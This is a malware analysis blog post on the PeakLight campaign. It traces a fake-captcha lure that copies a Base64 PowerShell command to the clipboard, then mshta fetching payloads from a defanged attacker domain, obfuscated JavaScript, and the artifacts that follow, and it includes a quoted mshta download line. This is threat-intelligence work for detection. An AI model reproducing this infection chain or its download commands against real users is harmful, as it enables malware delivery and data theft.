himitsuflavor.medium.com Open in urlscan Pro
2606:4700:7::a29f:9804  Public Scan

Form analysis
0 forms found in the DOM

Text Content

Open in app

Sign up

Sign in

Write


Sign up

Sign in




PEAKLIGHT CAMPAIGN — MSHTA

NaotaClone

·

Follow

Published in

InfoSec Write-ups

·
5 min read
·
2 hours ago

1



Listen

Share


PEAKLIGHT MALWARE

During these last months, the PeakLight Malware has taken a high prominence due
to its violent infection campaign through CDN Links (Content Delivery) which is
responsible for tricking the user into executing coded command lines or
malicious artifacts through fake captcha and/or verification portals (Image
1.1).


Image 1.1 Infection Method — High Level.

It is designed for the theft of information and takeover of infected stations
through different persistence and evasion techniques of protection and detection
such as indirect executions through LOLBINS and a multi-stage infection chain.
In turn, it takes advantage of directories with global permissions in order to
facilitate the deployment of artifacts, given its modularity it uses both
legitimate artifacts (different software generated by legitimate companies) and
malicious artifacts that are responsible for completing the infection process.


INFECTION CHAIN

Given various intelligence sources, it is verified that the initial point of
infection is carried out through advertising and pop-ups existing within
different pages of the Internet which redirects a site with the domain
*.b-cdn.net/* (image 2.1) that contains a verification captcha giving
instructions to open Run on the system and paste a value.


Image 2.1 b-cdn.net site with fake captcha.

The string mentioned above is automatically copied to the clipboard when you
click on the check button through the document.execCommand() function (image
2.2), the script specifies that the value to be copied will be a Base64 encoded
Powershell line that executes the command Mshta.exe “<evil_url>”.


Image 2.2 Script within the “*.b-cdn.net” site.

For the infection chain to continue, the victim must follow these steps manually
in order to correctly generate the conditions for the deployment of the
artifacts, this can be identified through executions of Powershell.exe that have
Explorer.exe parent process.

As an example, this execution was carried out where Event ID 1 (Process Created)
indicates the aforementioned parameters (image 2.3).


Image 2.3 Powershell execution logs via Run.

Consequently, it can be seen that the Payload contained in the PowerShell line
corresponds to a Mshta.exe command line (image 2.4), which performs an indirect
execution of the malicious artifact obtained through mshta.exe
“clicktogo[*]click/Downloads/tra3” (image 2.5).


Figure 2.4 MSHTA Command Line.

Image 2.5 Download of tra3.

The content generated by tra3 (image 2.5) corresponds to a compressed JavaScript
file which has double obfuscation (image 2.6) based on the replacement of values
through the positioning of variables.


Image 2.6 JavaScript code obfuscated in tra3.

Once the first phase has been deobfuscated, the call to different functions is
observed that is responsible for executing the result of the second
deobfuscation process through the ActiveXObject function (function used to
create COM objects) contained in the Bin variable (image 2.7).


Image 2.7 Second phase of deobfuscation.

After the second phase, you can see the deobfuscated script which creates the
WScript.Shell object to execute system command lines using Bin.Run that contains
a Powershell script encrypted through the AES protocol (image 2.8).


Image 2.9 Completely deobfuscated JavaScript code.

This execution makes a network connection (image 2.11) to the
clicktogo[*]click/Downloads/tar3.zip URL (obtained after decrypting and
deobfuscating the Powershell command line).


Figure 2.10 Network Connections — DNS Query.

This process is responsible for downloading and establishing various artifacts
(image 2.11) used by the attacker (image 2.12) within the attack chain on the
system.


Figure 2.11 Creating Files through tar3.zip.

Figure 2.12 Binary Setup.exe generated by “tar3.zip”.

Among the artifacts generated is Setup.exe (image 2.12) which executes
automatically when executing the encrypted powershell, which generates the
more.com process and the conhost.exe thread (image 2.13).


Figure 2.13 Execution of Setup.exe.

The More.com process in turn generates another process called RewardFlaccid.a3x
(Figure 2.15) approximately 15 seconds after the Setup.exe process ends.


Figure 2.15 Network activity generated by RewardFlaccid.a3x.

> Once the network activity generated by RewardFlaccid.a3x is finished, the
> process is terminated and the infection chain culminates with all the
> artifacts already deployed on the victim’s station.


INFECTION CHAIN

Given the analysis carried out, the infection process can be summarized in 4
phases (Figure 3.1):

1. Initial Phase: Corresponds to Internet browsing on sites that contain ads
and/or pop-ups related to PeakLight’s campaigns.

2. Access Point: The user falls for the attack by following the manual execution
instructions outlined on the attacker’s site.

3. Execution Point: The lack of restrictions on the execution of command lines
through the terminal allows the indirect execution of Mshta.exe which is
responsible for downloading the artifacts.

4. Deployment Point: Once the artifacts are downloaded, they are deployed in the
AppData\Local\* directory and run autonomously making network connections
through TLS to the attacker’s site, culminating the infection process.


Figure 3.1 Summary of infection chain.



SIGN UP TO DISCOVER HUMAN STORIES THAT DEEPEN YOUR UNDERSTANDING OF THE WORLD.


FREE



Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.


Sign up for free


MEMBERSHIP



Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app


Try for 5 $/month
Threat Hunting
Malware
Threat Intelligence
Threat Modeling
Threat Detection


1

1



Follow



WRITTEN BY NAOTACLONE

2 Followers
·Writer for

InfoSec Write-ups

Sake no bink yo ho ho!

Follow




MORE FROM NAOTACLONE AND INFOSEC WRITE-UPS

NaotaClone

in

InfoSec Write-ups


ICMP EXFILTRATION WITH HIMITSU


1. ICMP PROTOCOL OVERVIEW

Dec 14, 2023
2


NaotaClone

in

InfoSec Write-ups


ICMP EXFILTRATION WITH HIMITSU


1. ICMP PROTOCOL OVERVIEW

Dec 14, 2023
2


Dec 14, 2023
2


See all from NaotaClone
See all from InfoSec Write-ups



RECOMMENDED FROM MEDIUM

Richard de Vries



in

Tales from a Security Professional


THREAT INTELLIGENCE - THE LIFELINE FOR EVERY SECURITY OPERATION CENTER


ESTABLISHING A CTI TEAM IS CRUCIAL FOR ENHANCING THE OPERATIONAL EFFICIENCY AND
EFFECTIVENESS OF A SOC.


Aug 25
1



Alexander Nguyen

in

Level Up Coding


THE RESUME THAT GOT A SOFTWARE ENGINEER A $300,000 JOB AT GOOGLE.


1-PAGE. WELL-FORMATTED.


Jun 1
21K
407




LISTS


STAFF PICKS

734 stories·1301 saves


STORIES TO HELP YOU LEVEL-UP AT WORK

19 stories·800 saves


SELF-IMPROVEMENT 101

20 stories·2744 saves


PRODUCTIVITY 101

20 stories·2350 saves


VanVleet


COMPOUND PROBABILITY: YOU DON’T NEED 100% COVERAGE TO WIN


WHY YOU DON’T NEED TO HAVE 100% ATTACK SURFACE COVERAGE TO HAVE A STRONG CHANCE
OF DETECTING ATTACKERS IN YOUR ENTERPRISE.

Sep 5
28
1



Jonathan Mondaut


HOW CHATGPT TURNED ME INTO A HACKER


DISCOVER HOW CHATGPT HELPED ME BECOME A HACKER, FROM GATHERING RESOURCES TO
TACKLING CTF CHALLENGES, ALL WITH THE POWER OF AI.


Jun 18
1.1K
41



Jonas Bülow Knudsen

in

Posts By SpecterOps Team Members


ADCS ATTACK PATHS IN BLOODHOUND — PART 3


IN THIS BLOG POST, WE WILL EXPLORE THE NEW ESC6/ESC9/ESC10 EDGES WE HAVE
INTRODUCED WITH ADCS SUPPORT IN BLOODHOUND.

6d ago
15



Sathyaprakash Sahoo

in

InfoSec Write-ups


HERE’S WHY I DON’T SUGGEST PEOPLE TO GET INTO CYBERSECURITY


WHAT MOST WON’T TELL YOU ABOUT A CAREER IN CYBERSECURITY


Sep 10
465
8


See more recommendations

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams

To make Medium work, we log user data. By using Medium, you agree to our Privacy
Policy, including cookie policy.